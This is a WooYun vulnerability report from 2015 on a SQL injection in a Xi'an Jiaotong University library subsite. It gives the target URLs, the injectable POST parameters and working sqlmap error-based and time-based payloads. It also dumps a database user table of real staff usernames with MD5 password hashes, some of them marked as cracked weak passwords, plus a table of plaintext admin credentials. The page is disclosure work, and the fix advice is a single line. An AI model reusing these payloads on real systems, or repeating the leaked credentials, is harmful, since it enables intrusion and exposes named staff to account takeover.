西安交通大学某分站POST sql注入 | wooyun-2015-0104128| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0104128

漏洞标题：西安交通大学某分站POST sql注入

漏洞作者：路人甲

提交时间：2015-03-30 10:33

修复时间：2015-05-14 10:48

公开时间：2015-05-14 10:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-30：细节已通知厂商并且等待厂商处理中
2015-03-30：厂商已经确认，细节仅向厂商公开
2015-04-09：细节向核心白帽子及相关领域专家公开
2015-04-19：细节向普通白帽子公开
2015-04-29：细节向实习白帽子公开
2015-05-14：细节向公众公开

简要描述：

POST sql注入

详细说明：

http://www.lib.xjtu.edu.cn/bookriview.do
post参数
action=page&sortType=*&goal=*&indexPage=1&bookname=*
另一处：
http://www.lib.xjtu.edu.cn/news.do
post参数
action=page&sortType=*&goal=*&indexPage=1&title=*

sqlmap identified the following injection points with a total of 1236 HTTP(s) requests:
---
Parameter: bookname (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG
    Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
---
web application technology: JSP
back-end DBMS: MySQL 5.0
available databases [12]:
[*] arc
[*] information_schema
[*] journal
[*] lib
[*] libcms
[*] mysql
[*] resourceGate
[*] resourceNav
[*] shanxicalis
[*] test
[*] xbnlcms
[*] xnold
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: bookname (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG
    Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
---
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: libcms
Table: user
[7 columns]
+------------+
| Column     |
+------------+
| DEPARTMENT |
| EMAIL      |
| ID         |
| NAME       |
| PASSWORD   |
| STATUS     |
| USERNAME   |
+------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: bookname (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG
    Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
---
web application technology: JSP
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: bookname (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG
    Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
---
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: libcms
Table: user
[36 entries]
+--------------+----------------------------------+
| USERNAME     | PASSWORD                         |
+--------------+----------------------------------+
| admin        | 0192023a7bbd73250516f069df18b500 | （弱口令密码admin123）
| admin123     | 0192023a7bbd73250516f069df18b500 |  (弱口令密码admin123)
| caifang      | 0495fa657d3a4a348aad8f2c1bd8e8bc |
| mysk         | 05e67caa6913bd3c2b63a2b6ce2a289f |
| chenbin      | 18a8474b67bb1f43cb4e41e600294d70 |
| hanmeng      | 1a9dd20c01de9e76683aba9ddf23d30b |
| zhanglin     | 202cb962ac59075b964b07152d234b70 |
| zhouqi       | 21232f297a57a5a743894a0e4a801fc3 |
| gaowenli     | 238c26372e700c58d689924060a8d5eb |
| qikan        | 30f175e6bff6fced1a99398750260018 |
| zhangzy      | 31568e2c93090de9b71bac40f188e983 |
| lijuan       | 3341af1b873a60450a0e0388f7621d38 |
| myjxw        | 38c3da00544da9f3928208a8e9fca0d7 |
| zhangxm      | 45105a5f6b77081b9e40c65b95c42fd6 |
| bianmu       | 496cdd655db28ab0ae546071485621c8 |
| liutong      | 4a13ce88290625fe7531df5d3bc1ae5b |
| gaojianzhong | 4c077802118f286dc1481e7aa77dc228 |
| zhouqin      | 73543541802e25aedd8402f584a5f9a0 |
| zhangjing    | 7a53928fa4dd31e82c6ef826f341daec |
| yuanmei      | 95a00694c96679ea7481fd361c07cd91 |
| lidan        | 9882a23bb4373c6f291200d07c9a6739 |
| lidan        | a176d29d37c64d4df44cf5b07330276b |
| weiqingshan  | b5659d581bb341db24d1d796e30ab345 |
| zhouq        | b5659d581bb341db24d1d796e30ab345 |
| chenn        | b63e29d4358ed6018d60cfcd0f99fbc4 |
| chenwei      | b63e29d4358ed6018d60cfcd0f99fbc4 |
| qiaoyaming   | b63e29d4358ed6018d60cfcd0f99fbc4 |
| yuelan       | ba05aa90ea6f23a0729cb5d9aa3a7f65 |
| zixun        | bb460906a52ff5d514ac7cbd9e17c982 |
| qiuping      | bbb65a57d4a599487fcc558559e6e1ac |
| zhangzhiyan  | cd4b097bece019787c3f80060b455d90 |
| luohong      | dd9c0929817c5d38a4ff6193a260b34e |
| myxs         | ddc692ea9caae72071d6343d2620a222 |
| suwanying    | e10adc3949ba59abbe56e057f20f883e |
| tanshuping   | e902a36ade483cde97d806974068a10f |
| yejian       | f411c16058201360ce74fd1b9dce1370 |

漏洞证明：

web application technology: JSP
back-end DBMS: MySQL 5.0
Database: libcms
Table: user
[36 entries]
+--------------+----------------------------------+
| USERNAME     | PASSWORD                         |
+--------------+----------------------------------+
| admin        | 0192023a7bbd73250516f069df18b500 | （弱口令密码admin123）
| admin123     | 0192023a7bbd73250516f069df18b500 |  (弱口令密码admin123)
| caifang      | 0495fa657d3a4a348aad8f2c1bd8e8bc |
| mysk         | 05e67caa6913bd3c2b63a2b6ce2a289f |
| chenbin      | 18a8474b67bb1f43cb4e41e600294d70 |
| hanmeng      | 1a9dd20c01de9e76683aba9ddf23d30b |
| zhanglin     | 202cb962ac59075b964b07152d234b70 |
| zhouqi       | 21232f297a57a5a743894a0e4a801fc3 |
| gaowenli     | 238c26372e700c58d689924060a8d5eb |
| qikan        | 30f175e6bff6fced1a99398750260018 |
| zhangzy      | 31568e2c93090de9b71bac40f188e983 |
| lijuan       | 3341af1b873a60450a0e0388f7621d38 |
| myjxw        | 38c3da00544da9f3928208a8e9fca0d7 |
| zhangxm      | 45105a5f6b77081b9e40c65b95c42fd6 |
| bianmu       | 496cdd655db28ab0ae546071485621c8 |
| liutong      | 4a13ce88290625fe7531df5d3bc1ae5b |
| gaojianzhong | 4c077802118f286dc1481e7aa77dc228 |
| zhouqin      | 73543541802e25aedd8402f584a5f9a0 |
| zhangjing    | 7a53928fa4dd31e82c6ef826f341daec |
| yuanmei      | 95a00694c96679ea7481fd361c07cd91 |
| lidan        | 9882a23bb4373c6f291200d07c9a6739 |
| lidan        | a176d29d37c64d4df44cf5b07330276b |
| weiqingshan  | b5659d581bb341db24d1d796e30ab345 |
| zhouq        | b5659d581bb341db24d1d796e30ab345 |
| chenn        | b63e29d4358ed6018d60cfcd0f99fbc4 |
| chenwei      | b63e29d4358ed6018d60cfcd0f99fbc4 |
| qiaoyaming   | b63e29d4358ed6018d60cfcd0f99fbc4 |
| yuelan       | ba05aa90ea6f23a0729cb5d9aa3a7f65 |
| zixun        | bb460906a52ff5d514ac7cbd9e17c982 |
| qiuping      | bbb65a57d4a599487fcc558559e6e1ac |
| zhangzhiyan  | cd4b097bece019787c3f80060b455d90 |
| luohong      | dd9c0929817c5d38a4ff6193a260b34e |
| myxs         | ddc692ea9caae72071d6343d2620a222 |
| suwanying    | e10adc3949ba59abbe56e057f20f883e |
| tanshuping   | e902a36ade483cde97d806974068a10f |
| yejian       | f411c16058201360ce74fd1b9dce1370 |

以下表的密码明文存储

web application technology: JSP
back-end DBMS: MySQL 5.0
Database: xnold
Table: db_user
[3 entries]
+----+---------------+-------------------+---------+---------+----------+
| id | name          | email             | account | role_fk | password |
+----+---------------+-------------------+---------+---------+----------+
| 1  | Ã©Å¸Â©Ã¨Â¿â€º | [email protected] | admin   | 1       | admin    |
| 2  | Ã¥Â�Â´Ã¦ËœÅ   | [email protected]   | test3   | 3       | 1        |
| 6  | 2             | 2                 | test2   | 2       | 2        |
+----+---------------+-------------------+---------+---------+----------+

修复方案：

注意参数过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-03-30 10:46

厂商回复：

通知用户处理中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0104128

漏洞标题：西安交通大学某分站POST sql注入

相关厂商：西安交通大学

漏洞作者：路人甲

提交时间：2015-03-30 10:33

修复时间：2015-05-14 10:48

公开时间：2015-05-14 10:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0104128

漏洞标题：西安交通大学某分站POST sql注入

相关厂商：西安交通大学

漏洞作者： 路人甲

提交时间：2015-03-30 10:33

修复时间：2015-05-14 10:48

公开时间：2015-05-14 10:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0104128"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云